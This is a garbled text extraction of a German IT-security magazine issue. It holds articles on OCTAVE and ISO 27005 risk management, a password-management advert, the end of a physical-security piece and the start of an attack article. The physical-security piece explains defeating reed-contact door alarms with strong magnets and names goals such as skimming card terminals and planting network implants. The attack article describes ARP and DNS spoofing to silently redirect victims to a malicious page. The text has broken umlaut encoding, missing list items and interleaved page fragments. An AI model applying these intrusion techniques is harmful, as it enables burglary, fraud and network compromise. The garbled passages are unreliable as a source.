Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
